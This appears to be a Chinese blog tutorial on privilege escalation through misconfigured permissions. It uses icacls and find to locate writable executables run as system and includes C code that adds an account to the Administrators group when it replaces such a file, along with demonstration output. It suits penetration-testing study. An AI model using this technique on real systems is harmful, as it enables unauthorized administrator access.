渗透测试之提权:利用配置不当提权

一、概述

  与漏洞提权相比,更常用的方法

  • 企业环境
  • 补丁更新的全部已经安装
  • 输入变量过滤之外更值得研发关注的安全隐患
  • 以system权限启动
  • NTFS权限允许users修改删除

  也就是说,通过查看哪些服务默认以system权限启动,NTFS权限允许users修改删除本身,可将其替换或绑定反弹shell程序等完成提权。

二、windows 系统

  icacls 命令【windows 2003以后的系统中包含的程序】

    查询某一文件的NTFS权限(F:完全控制权限),如:

icacls c:\windows\*.exe /save perm /T

 

  上图RegSnap.exe(如 1 )是符合条件的(FA;;;BU),虽然admin.exe也含有(FA;;;BU)(如 2) ,但由位置可知默认的普通用户对RegSnap.exe的权限(完全控制)高于对admin.exe的权限。为此可将RegSnap.exe作为修改或绑定目标。

备注:BU=BUILTIN\Users,默认的普通用户组

测试代码(admin.c=>admin.exe)

#include <stdlib.h>
int main()
{
   int i;
   i=system("net localgroup Administrators a /add");
   return 0;
}

将 admin.c 编译成 admin.exe 后,重命名为RegSnap.exe,替换原来的 RegSnap.exe,当 RegSnap.exe 执行后则 a 账户会被添加到管理员组,演示如下:

复制代码
C:\Documents and Settings\Administrator\桌面>net user a
用户名                 a
……………………

本地组成员
全局组成员             *Domain Users
命令成功完成。


C:\Documents and Settings\Administrator\桌面>RegSnap.lnk

C:\Documents and Settings\Administrator\桌面>命令成功完成。


C:\Documents and Settings\Administrator\桌面>net user a
用户名                 a
…………………………

本地组成员             *Administrators
全局组成员             *Domain Users
命令成功完成。
复制代码

三、Linux 系统

find 命令

如:

find / -perm 777 -exec ls -l {} \;

其他操作类似Windows 系统。

若渗透进去的是应用程序,则查应用系统的配置文件

  • 通过应用连接数据库的配置文件,发现其连接的服务账号
  • 后台服务运行账号【有可能root账号运行web服务】
posted @   z9m8r8  阅读(87)  评论(0编辑  收藏  举报
编辑推荐:
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示